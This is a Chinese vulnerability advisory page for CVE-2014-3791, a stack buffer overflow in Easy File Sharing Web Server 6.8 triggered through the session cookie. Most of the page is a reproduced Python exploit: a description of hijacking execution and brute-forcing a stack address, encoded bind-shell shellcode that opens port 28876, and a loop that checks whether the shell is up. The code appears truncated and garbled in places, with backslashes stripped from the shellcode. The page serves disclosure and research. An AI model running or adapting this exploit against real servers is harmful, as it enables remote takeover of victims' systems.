首页 / 操作系统 / Linux / Easy File Sharing Web Server 栈缓冲区溢出漏洞
发布日期:2014-05-14 更新日期:2014-05-23受影响系统: EFS Software Easy File Sharing Web Server 6.8 描述: -------------------------------------------------------------------------------- BUGTRAQ ID: 67406 CVE(CAN) ID: CVE-2014-3791
Easy File Sharing Web Server是文件共享软件,用户通过浏览器即可上传下载文件。
Easy File Sharing Web Server 6.8及其他版本处理SESSIONID cookie时没有正确验证某些用户输入,存在栈缓冲区溢出漏洞,攻击者可利用此漏洞以系统级别权限执行任意代码。
<*来源:superkojiman
链接:http://osvdb.org/show/osvdb/106965 *>测试方法: --------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负! # Exploit Title: Easy File Sharing Web Server 6.8 stack buffer overflow # Date: 10 May 2014 # Exploit Author: superkojiman - http://www.techorganic.com # Vendor Homepage: http://www.efssoft.com # Software Link: http://www.sharing-file.com/efssetup.exe # Version: 6.8 # Tested on: English version of Windows XP Professional SP2 and SP3 # # Description: # By setting UserID in the cookie to a long string, we can overwrite EDX which # allows us to control execution flow when the following instruction is # executed: # # 0x0045C8C2: CALL DWORD PTR DS:[EDX+28] # # We can point EDX+28 to a location in the stack containing a pointer to # instructions we want to execute. This pointer can be placed at 0x01??6969. # Under Windows XP Professional SP2/SP3, the first, third, and fourth bytes # in the address are always the same. The second byte is random so we need # to bruteforce it. This takes at most 255 tries and the server doesn"t crash # so we can keep trying. # # The pointer placed at 0x01??6969 is a pointer to a CALL ESI. ESI points to # a small space in our payload. We fill this small space with instructions to # jump further down the stack where our shellcode is stored. # # Tested with Easy File Sharing Webserver installed in the default location at # C:EFS SoftwareEasy File Sharing Web Server # import socket import struct import time import sys target = "192.168.1.140" port = 80 # Shellcode from https://code.google.com/p/w32-bind-ngs-shellcode/ # Binds a shell on port 28876 # msfencode -b "x00x20" -i w32-bind-ngs-shellcode.bin # [*] x86/shikata_ga_nai succeeded with size 241 (iteration=1) shellcode = ( "xbbxa1x68xdex7cxddxc0xd9x74x24xf4x58x33xc9" + "xb1x36x31x58x14x83xe8xfcx03x58x10x43x9dxef" + "xb5xe7xd5x61x76x6cx9fx8dxfdx04x7cx05x6fxe0" + "xf7x67x50x7bx31xa0xdfx63x4bx23x8exfbx81x9c" + "x02xc9x8dx44x33x5ax3dxe1x0cx2bxc8x69xfbxd5" + "x7ex8axd5xd5xa8x41xacx02x7cxaax05x8dxd0x0c" + "x0bx5ax82x0dx44x48x80x5dx10xcdxf4xeax7axf0" + "x7cxecx69x81x36xcex6cx7cx9ex3fxbdx3cx94x74" + "xd0xc1x44xc0xe4x6dxacx58x21xa9xf1xebx44xc6" + "x30x2bxd2xc3x1bxb8x57x37xa5x57x68x80xb1xf6" + "xfcxa5xa5xf9xebxb0x3exfaxefx53x15x7dxd1x5a" + "x1fx76xa3x02xdbxd5x44x6axb4x4cx3axb4x48x1a" + "x8ax96x03x1bx3cx8bxa3x34x28x52x74x4bxacxdb" + "xb8xd9x43xb4x13x48x9bxeaxe9xb3x17xf2xc3xe1" + "x8ax6ax47x6bx4fx4ax0ax0fxabxb2xbfx5bx18x04" + "xf8x72x5exdcx80xb9x45x8bxdcx93xd7xf5xa6xfc" + "xd0xaex7ax51xb6x02x84x03xdcx29x3cx50xf5xe7" + "x3ex57xf9" ) print "[+] We"re guessing an address on the stack. It will be a few minutes..." for i in xrange(1,255): n = "" if i < 16: n = "0" + hex(i)[-1] else: n = hex(i)[2:] # craft the value of EDX that will be used in CALL DWORD PTR DS:[EDX+28] guess = "0x01" + n + "6940" sys.stdout.write("=");
try: # check if we guessed the correct address by connecting to port 28876 s2 = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s2.connect((target, 28876)) s2.close() print "
[+] Success! A shell is waiting on port 28876!" break except Exception,e: pass建议: -------------------------------------------------------------------------------- 厂商补丁:
易网时代-编程资源站